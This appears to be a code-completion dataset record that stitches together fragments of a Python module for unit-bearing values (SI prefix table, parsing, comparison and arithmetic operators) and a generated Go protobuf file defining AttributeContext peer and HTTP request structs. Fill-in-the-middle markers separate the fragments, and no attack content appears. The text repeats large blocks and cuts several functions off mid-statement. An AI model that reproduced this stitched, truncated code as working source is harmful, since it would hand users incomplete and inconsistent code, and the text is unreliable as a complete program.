if num.count('.') > 1 or len(self._value_prefix) > 1:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
if self._value_prefix not in self._prefix_table:
raise ValueError("Bad prefix for {value}".format(value=value))
self._value = float(num) # type: float
# Preserve the prefix too to preserve precision
self._prefix = self._prefix_table[self._value_prefix] # type: float
@property
def value_prefix(self) -> str:
"""Get the prefix string of this value."""
return self._value_prefix
@property
def value(self) -> float:
"""Get the actual value of this value. (e.g. 10 ns -> 1e-9)"""
return self._value * self._prefix
def value_in_units(self, prefix: str, round_zeroes: bool = True) -> float:
"""Get this value in the given prefix. e.g. "ns", "mV", etc.
"""
# e.g. extract "n" from "ns" or blank if it's blank (e.g. "V" -> "")
letter_prefix = ""
if prefix != self.unit:
letter_prefix = "" if prefix == "" else prefix[0]
retval = self._value * (self._prefix / self._prefix_table[letter_prefix])
if round_zeroes: # pylint: disable=no-else-return
return round(retval, 3)
else:
return retval
def str_value_in_units(self, prefix: str, round_zeroes: bool = True) -> str:
"""Get this value in the given prefix but including the units.
e.g. return "5 ns".
:param prefix: Prefix for the resulting value - e.g. "ns".
:param round_zeroes: True to round 1.00000001 etc to 1 within 3 decimal places.
"""
# %g removes trailing zeroes
return "%g" % (self.value_in_units(prefix, round_zeroes)) + " " + prefix
# Comparison operators.
# Note that mypy doesn't properly support type checking on equality
# operators so the type of __eq__ is object :(
# As a result, the operators' (e.g. __eq__) 'other' type can't be _TT.
# Therefore, we implement the operators themselves separately and then wrap
# them in the special operators.
# See https://github.com/python/mypy/issues/1271
# Disable useless pylint checks for the following methods.
# pylint: disable=unidiomatic-typecheck
def eq(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare equality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value_in_units(self.default_prefix) == other.value_in_units(self.default_prefix)
def __eq__(self: _TT, other: object) -> bool:
"""
Compare equality of this value with another.
The types must match.
"""
return self.eq(other) # type: ignore
def ne(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare inequality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return not self.eq(other)
def __ne__(self: _TT, other: object) -> bool:
"""
Compare inequality of this value with another.
The types must match.
"""
return self.ne(other) # type: ignore
def __lt__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value < other.value
def __le__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value <= other.value
def __gt__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value > other.value
def __ge__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value >= other.value
def __add__(self: _TT, other: _TT) -> _TT:
"""
Add other and self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value + other.value),"")
def __sub__(self: _TT, other: _TT) -> _TT:
"""
Subtract other from self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value - other.value),"")
def __div__(self: _TT, other: float) -> _TT:
"""
Divide self by a float or an integer.
"""
raise NotImplementedError()
# Some python nonsense
def __truediv__(self: _TT, other: float) -> _TT:
return type(self)(str(self.value / other),"")
def __mul__(self: _TT, other: float) -> _TT:
"""
Multiply self by | _prefix_table = {
'y': 1e-24, # yocto | random_line_split |
units.py | particular value that has units (e.g. "10 ns", "2000 um", "25 C", etc).
"""
# From https://stackoverflow.com/a/10970888
_prefix_table = {
'y': 1e-24, # yocto
'z': 1e-21, # zepto
'a': 1e-18, # atto
'f': 1e-15, # femto
'p': 1e-12, # pico
'n': 1e-9, # nano
'u': 1e-6, # micro
'm': 1e-3, # milli
'c': 1e-2, # centi
'd': 1e-1, # deci
'': 1, # <no prefix>
'k': 1e3, # kilo
'M': 1e6, # mega
'G': 1e9, # giga
'T': 1e12, # tera
'P': 1e15, # peta
'E': 1e18, # exa
'Z': 1e21, # zetta
'Y': 1e24, # yotta
}
@property
@abstractmethod
def unit(self) -> str:
|
@property
@abstractmethod
def unit_type(self) -> str:
"""Get the base unit type for values. (e.g. for "s", this would be "time")
Meant to be overridden by subclasses."""
@property
@abstractmethod
def default_prefix(self) -> str:
"""Get the default prefix for values.
(e.g. for time, specifying "n" would mean "0.25" would be interpreted as "0.25 ns".)
Meant to be overridden by subclasses."""
def __init__(self, value: str, prefix: Optional[str] = None) -> None:
"""
Create a value from parsing the given string.
:param value: Value encoded in the given string.
:param prefix: If value does not have a prefix (e.g. "0.25"), then use
the given prefix, or the default prefix defined by the
class if one is not specified.
"""
import re
default_prefix = get_or_else(prefix, self.default_prefix)
regex = r"^(-?[\d.]+) *(.*){}$".format(re.escape(self.unit))
match = re.search(regex, value)
if match is None:
try:
num = str(float(value))
self._value_prefix = default_prefix
except ValueError:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
else:
num = match.group(1)
self._value_prefix = match.group(2)
if num.count('.') > 1 or len(self._value_prefix) > 1:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
if self._value_prefix not in self._prefix_table:
raise ValueError("Bad prefix for {value}".format(value=value))
self._value = float(num) # type: float
# Preserve the prefix too to preserve precision
self._prefix = self._prefix_table[self._value_prefix] # type: float
@property
def value_prefix(self) -> str:
"""Get the prefix string of this value."""
return self._value_prefix
@property
def value(self) -> float:
"""Get the actual value of this value. (e.g. 10 ns -> 1e-9)"""
return self._value * self._prefix
def value_in_units(self, prefix: str, round_zeroes: bool = True) -> float:
"""Get this value in the given prefix. e.g. "ns", "mV", etc.
"""
# e.g. extract "n" from "ns" or blank if it's blank (e.g. "V" -> "")
letter_prefix = ""
if prefix != self.unit:
letter_prefix = "" if prefix == "" else prefix[0]
retval = self._value * (self._prefix / self._prefix_table[letter_prefix])
if round_zeroes: # pylint: disable=no-else-return
return round(retval, 3)
else:
return retval
def str_value_in_units(self, prefix: str, round_zeroes: bool = True) -> str:
"""Get this value in the given prefix but including the units.
e.g. return "5 ns".
:param prefix: Prefix for the resulting value - e.g. "ns".
:param round_zeroes: True to round 1.00000001 etc to 1 within 3 decimal places.
"""
# %g removes trailing zeroes
return "%g" % (self.value_in_units(prefix, round_zeroes)) + " " + prefix
# Comparison operators.
# Note that mypy doesn't properly support type checking on equality
# operators so the type of __eq__ is object :(
# As a result, the operators' (e.g. __eq__) 'other' type can't be _TT.
# Therefore, we implement the operators themselves separately and then wrap
# them in the special operators.
# See https://github.com/python/mypy/issues/1271
# Disable useless pylint checks for the following methods.
# pylint: disable=unidiomatic-typecheck
def eq(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare equality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value_in_units(self.default_prefix) == other.value_in_units(self.default_prefix)
def __eq__(self: _TT, other: object) -> bool:
"""
Compare equality of this value with another.
The types must match.
"""
return self.eq(other) # type: ignore
def ne(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare inequality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return not self.eq(other)
def __ne__(self: _TT, other: object) -> bool:
"""
Compare inequality of this value with another.
The types must match.
"""
return self.ne(other) # type: ignore
def __lt__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value < other.value
def __le__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value <= other.value
def __gt__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value > other.value
def __ge__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value >= other.value
def __add__(self: _TT, other: _TT) -> _TT:
"""
Add other and self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value + other.value),"")
def __sub__(self: _TT, other: _TT) -> _TT:
"""
Subtract other from self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value - other.value),"")
def __div__(self: _TT, other: float) -> _TT:
"""
Divide self by a float or an integer.
"""
raise NotImplementedError()
# Some python nonsense
def __truediv__(self: _TT, other: float) -> _TT:
return type(self)(str(self.value / other),"")
def __mul__(self: _TT, other: float) -> _TT:
"""
Multiply | """Get the base unit for values (e.g. "s", "m", "V", etc).
Meant to be overridden by subclasses.""" | identifier_body |
attribute_context.pb.go | type AttributeContext_Peer struct {
// The address of the peer, this is typically the IP address.
// It can also be UDS path, or others.
Address *core.Address `protobuf:"bytes,1,opt,name=address,proto3" json:"address,omitempty"`
// The canonical service name of the peer.
// It should be set to :ref:`the HTTP x-envoy-downstream-service-cluster
// <config_http_conn_man_headers_downstream-service-cluster>`
// If a more trusted source of the service name is available through mTLS/secure naming, it
// should be used.
Service string `protobuf:"bytes,2,opt,name=service,proto3" json:"service,omitempty"`
// The labels associated with the peer.
// These could be pod labels for Kubernetes or tags for VMs.
// The source of the labels could be an X.509 certificate or other configuration.
Labels map[string]string `protobuf:"bytes,3,rep,name=labels,proto3" json:"labels,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The authenticated identity of this peer.
// For example, the identity associated with the workload such as a service account.
// If an X.509 certificate is used to assert the identity this field should be sourced from
// `URI Subject Alternative Names`, `DNS Subject Alternate Names` or `Subject` in that order.
// The primary identity should be the principal. The principal format is issuer specific.
//
// Example:
// * SPIFFE format is `spiffe://trust-domain/path`
// * Google account format is `https://accounts.google.com/{userid}`
Principal string `protobuf:"bytes,4,opt,name=principal,proto3" json:"principal,omitempty"`
	// The X.509 certificate used to authenticate the identity of this peer.
// When present, the certificate contents are encoded in URL and PEM format.
Certificate string `protobuf:"bytes,5,opt,name=certificate,proto3" json:"certificate,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Peer) Reset() { *m = AttributeContext_Peer{} }
func (m *AttributeContext_Peer) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Peer) ProtoMessage() {}
func (*AttributeContext_Peer) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 0}
}
func (m *AttributeContext_Peer) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Peer.Unmarshal(m, b)
}
func (m *AttributeContext_Peer) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Peer.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Peer) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Peer.Merge(m, src)
}
func (m *AttributeContext_Peer) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Peer.Size(m)
}
func (m *AttributeContext_Peer) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Peer.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Peer proto.InternalMessageInfo
func (m *AttributeContext_Peer) GetAddress() *core.Address {
if m != nil {
return m.Address
}
return nil
}
func (m *AttributeContext_Peer) GetService() string {
if m != nil {
return m.Service
}
return ""
}
func (m *AttributeContext_Peer) GetLabels() map[string]string {
if m != nil {
return m.Labels
}
return nil
}
func (m *AttributeContext_Peer) GetPrincipal() string {
if m != nil {
return m.Principal
}
return ""
}
func (m *AttributeContext_Peer) GetCertificate() string {
if m != nil {
return m.Certificate
}
return ""
}
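// Illustrative sketch (not part of the generated code): a client building the
// source peer for an authorization check might populate the struct roughly as
// below. The field names come from AttributeContext_Peer above; the concrete
// values are made up for the example.
//
//	peer := &AttributeContext_Peer{
//		Service:   "frontend",
//		Principal: "spiffe://example-trust-domain/frontend",
//		Labels:    map[string]string{"app": "frontend"},
//	}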
// Represents a network request, such as an HTTP request.
type AttributeContext_Request struct {
// The timestamp when the proxy receives the first byte of the request.
Time *timestamp.Timestamp `protobuf:"bytes,1,opt,name=time,proto3" json:"time,omitempty"`
// Represents an HTTP request or an HTTP-like request.
Http *AttributeContext_HttpRequest `protobuf:"bytes,2,opt,name=http,proto3" json:"http,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Request) Reset() { *m = AttributeContext_Request{} }
func (m *AttributeContext_Request) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Request) ProtoMessage() {}
func (*AttributeContext_Request) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 1}
}
func (m *AttributeContext_Request) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Request.Unmarshal(m, b)
}
func (m *AttributeContext_Request) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Request.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Request) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Request.Merge(m, src)
}
func (m *AttributeContext_Request) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Request.Size(m)
}
func (m *AttributeContext_Request) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Request.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Request proto.InternalMessageInfo
func (m *AttributeContext_Request) GetTime() *timestamp.Timestamp {
if m != nil {
return m.Time
}
return nil
}
func (m *AttributeContext_Request) GetHttp() *AttributeContext_HttpRequest {
if m != nil {
return m.Http
}
return nil
}
// This message defines attributes for an HTTP request.
// HTTP/1.x, HTTP/2, gRPC are all considered as HTTP requests.
// [#next-free-field: 12]
type AttributeContext_HttpRequest struct {
// The unique ID for a request, which can be propagated to downstream
// systems. The ID should have low probability of collision
// within a single day for a specific service.
// For HTTP requests, it should be X-Request-ID or equivalent.
Id string `protobuf:"bytes,1,opt,name=id,proto3" json:"id,omitempty"`
// The HTTP request method, such as `GET`, `POST`.
Method string `protobuf:"bytes,2,opt,name=method,proto3" json:"method,omitempty"`
// The HTTP request headers. If multiple headers share the same key, they
// must be merged according to the HTTP spec. All header keys must be
// lower-cased, because HTTP header keys are case-insensitive.
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The request target, as it appears in the first line of the HTTP request. This includes
// the URL path and query-string. No decoding is performed.
Path string `protobuf:"bytes,4,opt,name=path,proto3" json:"path,omitempty"`
	// The HTTP request `Host` or `Authority` header value.
Host string `protobuf:"bytes,5,opt,name=host,proto3" json:"host,omitempty"`
// The HTTP URL scheme, such as `http` and `https`.
Scheme string `protobuf:"bytes,6,opt,name=scheme,proto3" json:"scheme,omitempty"`
// This field is always empty, and exists for compatibility reasons. The HTTP URL query is
// included in `path` field.
Query string `protobuf:"bytes,7,opt,name=query,proto3" json:"query,omitempty"`
// This field is always empty, and exists for compatibility reasons. The URL fragment is
// not submitted as part of HTTP requests; it is unknowable.
Fragment string `protobuf:"bytes,8,opt,name=fragment,proto3" json:"fragment,omitempty"`
// The HTTP request size in bytes. If unknown, it must be -1.
Size int64 `protobuf:"varint,9,opt,name=size,proto3" json:"size,omitempty"`
// The network protocol used with the request, such as "HTTP/1.0", "HTTP/1.1", or "HTTP/2".
//
// See :repo:`headers.h:ProtocolStrings <source/common/http/headers.h>` for a list of all
// possible values.
Protocol string `protobuf:"bytes,10,opt,name=protocol,proto3" json:"protocol,omitempty"`
// The HTTP request body.
Body string `protobuf:"bytes,11,opt,name=body,proto3" json:"body,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func ( | random_line_split |
||
attribute_context.pb.go | (m *AttributeContext_Peer) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Peer) ProtoMessage() {}
func (*AttributeContext_Peer) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 0}
}
func (m *AttributeContext_Peer) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Peer.Unmarshal(m, b)
}
func (m *AttributeContext_Peer) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Peer.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Peer) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Peer.Merge(m, src)
}
func (m *AttributeContext_Peer) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Peer.Size(m)
}
func (m *AttributeContext_Peer) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Peer.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Peer proto.InternalMessageInfo
func (m *AttributeContext_Peer) GetAddress() *core.Address {
if m != nil {
return m.Address
}
return nil
}
func (m *AttributeContext_Peer) GetService() string {
if m != nil {
return m.Service
}
return ""
}
func (m *AttributeContext_Peer) GetLabels() map[string]string {
if m != nil {
return m.Labels
}
return nil
}
func (m *AttributeContext_Peer) GetPrincipal() string {
if m != nil {
return m.Principal
}
return ""
}
func (m *AttributeContext_Peer) GetCertificate() string {
if m != nil {
return m.Certificate
}
return ""
}
// Represents a network request, such as an HTTP request.
type AttributeContext_Request struct {
// The timestamp when the proxy receives the first byte of the request.
Time *timestamp.Timestamp `protobuf:"bytes,1,opt,name=time,proto3" json:"time,omitempty"`
// Represents an HTTP request or an HTTP-like request.
Http *AttributeContext_HttpRequest `protobuf:"bytes,2,opt,name=http,proto3" json:"http,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Request) Reset() { *m = AttributeContext_Request{} }
func (m *AttributeContext_Request) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Request) ProtoMessage() {}
func (*AttributeContext_Request) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 1}
}
func (m *AttributeContext_Request) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Request.Unmarshal(m, b)
}
func (m *AttributeContext_Request) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Request.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Request) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Request.Merge(m, src)
}
func (m *AttributeContext_Request) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Request.Size(m)
}
func (m *AttributeContext_Request) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Request.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Request proto.InternalMessageInfo
func (m *AttributeContext_Request) GetTime() *timestamp.Timestamp {
if m != nil {
return m.Time
}
return nil
}
func (m *AttributeContext_Request) GetHttp() *AttributeContext_HttpRequest {
if m != nil {
return m.Http
}
return nil
}
// This message defines attributes for an HTTP request.
// HTTP/1.x, HTTP/2, gRPC are all considered as HTTP requests.
// [#next-free-field: 12]
type AttributeContext_HttpRequest struct {
// The unique ID for a request, which can be propagated to downstream
// systems. The ID should have low probability of collision
// within a single day for a specific service.
// For HTTP requests, it should be X-Request-ID or equivalent.
Id string `protobuf:"bytes,1,opt,name=id,proto3" json:"id,omitempty"`
// The HTTP request method, such as `GET`, `POST`.
Method string `protobuf:"bytes,2,opt,name=method,proto3" json:"method,omitempty"`
// The HTTP request headers. If multiple headers share the same key, they
// must be merged according to the HTTP spec. All header keys must be
// lower-cased, because HTTP header keys are case-insensitive.
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The request target, as it appears in the first line of the HTTP request. This includes
// the URL path and query-string. No decoding is performed.
Path string `protobuf:"bytes,4,opt,name=path,proto3" json:"path,omitempty"`
	// The HTTP request `Host` or `Authority` header value.
Host string `protobuf:"bytes,5,opt,name=host,proto3" json:"host,omitempty"`
// The HTTP URL scheme, such as `http` and `https`.
Scheme string `protobuf:"bytes,6,opt,name=scheme,proto3" json:"scheme,omitempty"`
// This field is always empty, and exists for compatibility reasons. The HTTP URL query is
// included in `path` field.
Query string `protobuf:"bytes,7,opt,name=query,proto3" json:"query,omitempty"`
// This field is always empty, and exists for compatibility reasons. The URL fragment is
// not submitted as part of HTTP requests; it is unknowable.
Fragment string `protobuf:"bytes,8,opt,name=fragment,proto3" json:"fragment,omitempty"`
// The HTTP request size in bytes. If unknown, it must be -1.
Size int64 `protobuf:"varint,9,opt,name=size,proto3" json:"size,omitempty"`
// The network protocol used with the request, such as "HTTP/1.0", "HTTP/1.1", or "HTTP/2".
//
// See :repo:`headers.h:ProtocolStrings <source/common/http/headers.h>` for a list of all
// possible values.
Protocol string `protobuf:"bytes,10,opt,name=protocol,proto3" json:"protocol,omitempty"`
// The HTTP request body.
Body string `protobuf:"bytes,11,opt,name=body,proto3" json:"body,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_HttpRequest) Reset() { *m = AttributeContext_HttpRequest{} }
func (m *AttributeContext_HttpRequest) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_HttpRequest) ProtoMessage() {}
func (*AttributeContext_HttpRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 2}
}
func (m *AttributeContext_HttpRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_HttpRequest.Unmarshal(m, b)
}
func (m *AttributeContext_HttpRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_HttpRequest.Marshal(b, m, deterministic)
}
func (m *AttributeContext_HttpRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_HttpRequest.Merge(m, src)
}
func (m *AttributeContext_HttpRequest) XXX_Size() int {
return xxx_messageInfo_AttributeContext_HttpRequest.Size(m)
}
func (m *AttributeContext_HttpRequest) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_HttpRequest.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_HttpRequest proto.InternalMessageInfo
func (m *AttributeContext_HttpRequest) GetId() string {
if m != nil {
return m.Id
}
return ""
}
func (m *AttributeContext_HttpRequest) GetMethod() string {
if m != nil {
return m.Method
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHeaders() map[string]string {
if m != nil {
return m.Headers
}
return nil
}
func (m *AttributeContext_HttpRequest) GetPath() string {
if m != nil {
return m.Path
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHost() string {
if m != nil {
return m.Host
}
return ""
}
func (m *AttributeContext_HttpRequest) GetScheme() string {
if m != nil {
return m.Scheme
}
return ""
}
func (m *AttributeContext_HttpRequest) GetQuery() string {
if m != nil | {
return m.Query
} | conditional_block |
|
attribute_context.pb.go | () *core.Metadata {
if m != nil {
return m.MetadataContext
}
return nil
}
// This message defines attributes for a node that handles a network request.
// The node can be either a service or an application that sends, forwards,
// or receives the request. Service peers should fill in the `service`,
// `principal`, and `labels` as appropriate.
// [#next-free-field: 6]
type AttributeContext_Peer struct {
// The address of the peer, this is typically the IP address.
// It can also be UDS path, or others.
Address *core.Address `protobuf:"bytes,1,opt,name=address,proto3" json:"address,omitempty"`
// The canonical service name of the peer.
// It should be set to :ref:`the HTTP x-envoy-downstream-service-cluster
// <config_http_conn_man_headers_downstream-service-cluster>`
// If a more trusted source of the service name is available through mTLS/secure naming, it
// should be used.
Service string `protobuf:"bytes,2,opt,name=service,proto3" json:"service,omitempty"`
// The labels associated with the peer.
// These could be pod labels for Kubernetes or tags for VMs.
// The source of the labels could be an X.509 certificate or other configuration.
Labels map[string]string `protobuf:"bytes,3,rep,name=labels,proto3" json:"labels,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The authenticated identity of this peer.
// For example, the identity associated with the workload such as a service account.
// If an X.509 certificate is used to assert the identity this field should be sourced from
// `URI Subject Alternative Names`, `DNS Subject Alternate Names` or `Subject` in that order.
// The primary identity should be the principal. The principal format is issuer specific.
//
// Example:
// * SPIFFE format is `spiffe://trust-domain/path`
// * Google account format is `https://accounts.google.com/{userid}`
Principal string `protobuf:"bytes,4,opt,name=principal,proto3" json:"principal,omitempty"`
	// The X.509 certificate used to authenticate the identity of this peer.
// When present, the certificate contents are encoded in URL and PEM format.
Certificate string `protobuf:"bytes,5,opt,name=certificate,proto3" json:"certificate,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Peer) Reset() { *m = AttributeContext_Peer{} }
func (m *AttributeContext_Peer) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Peer) ProtoMessage() {}
func (*AttributeContext_Peer) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 0}
}
func (m *AttributeContext_Peer) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Peer.Unmarshal(m, b)
}
func (m *AttributeContext_Peer) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Peer.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Peer) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Peer.Merge(m, src)
}
func (m *AttributeContext_Peer) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Peer.Size(m)
}
func (m *AttributeContext_Peer) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Peer.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Peer proto.InternalMessageInfo
func (m *AttributeContext_Peer) GetAddress() *core.Address {
if m != nil {
return m.Address
}
return nil
}
func (m *AttributeContext_Peer) GetService() string {
if m != nil {
return m.Service
}
return ""
}
func (m *AttributeContext_Peer) GetLabels() map[string]string {
if m != nil {
return m.Labels
}
return nil
}
func (m *AttributeContext_Peer) GetPrincipal() string {
if m != nil {
return m.Principal
}
return ""
}
func (m *AttributeContext_Peer) GetCertificate() string {
if m != nil {
return m.Certificate
}
return ""
}
// Represents a network request, such as an HTTP request.
type AttributeContext_Request struct {
// The timestamp when the proxy receives the first byte of the request.
Time *timestamp.Timestamp `protobuf:"bytes,1,opt,name=time,proto3" json:"time,omitempty"`
// Represents an HTTP request or an HTTP-like request.
Http *AttributeContext_HttpRequest `protobuf:"bytes,2,opt,name=http,proto3" json:"http,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Request) Reset() { *m = AttributeContext_Request{} }
func (m *AttributeContext_Request) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Request) ProtoMessage() {}
func (*AttributeContext_Request) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 1}
}
func (m *AttributeContext_Request) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Request.Unmarshal(m, b)
}
func (m *AttributeContext_Request) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Request.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Request) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Request.Merge(m, src)
}
func (m *AttributeContext_Request) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Request.Size(m)
}
func (m *AttributeContext_Request) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Request.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Request proto.InternalMessageInfo
func (m *AttributeContext_Request) GetTime() *timestamp.Timestamp {
if m != nil {
return m.Time
}
return nil
}
func (m *AttributeContext_Request) GetHttp() *AttributeContext_HttpRequest {
if m != nil {
return m.Http
}
return nil
}
// This message defines attributes for an HTTP request.
// HTTP/1.x, HTTP/2, gRPC are all considered as HTTP requests.
// [#next-free-field: 12]
type AttributeContext_HttpRequest struct {
// The unique ID for a request, which can be propagated to downstream
// systems. The ID should have low probability of collision
// within a single day for a specific service.
// For HTTP requests, it should be X-Request-ID or equivalent.
Id string `protobuf:"bytes,1,opt,name=id,proto3" json:"id,omitempty"`
// The HTTP request method, such as `GET`, `POST`.
Method string `protobuf:"bytes,2,opt,name=method,proto3" json:"method,omitempty"`
// The HTTP request headers. If multiple headers share the same key, they
// must be merged according to the HTTP spec. All header keys must be
// lower-cased, because HTTP header keys are case-insensitive.
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The request target, as it appears in the first line of the HTTP request. This includes
// the URL path and query-string. No decoding is performed.
Path string `protobuf:"bytes,4,opt,name=path,proto3" json:"path,omitempty"`
// The HTTP request `Host` or 'Authority` header value.
Host string `protobuf:"bytes,5,opt,name=host,proto3" json:"host,omitempty"`
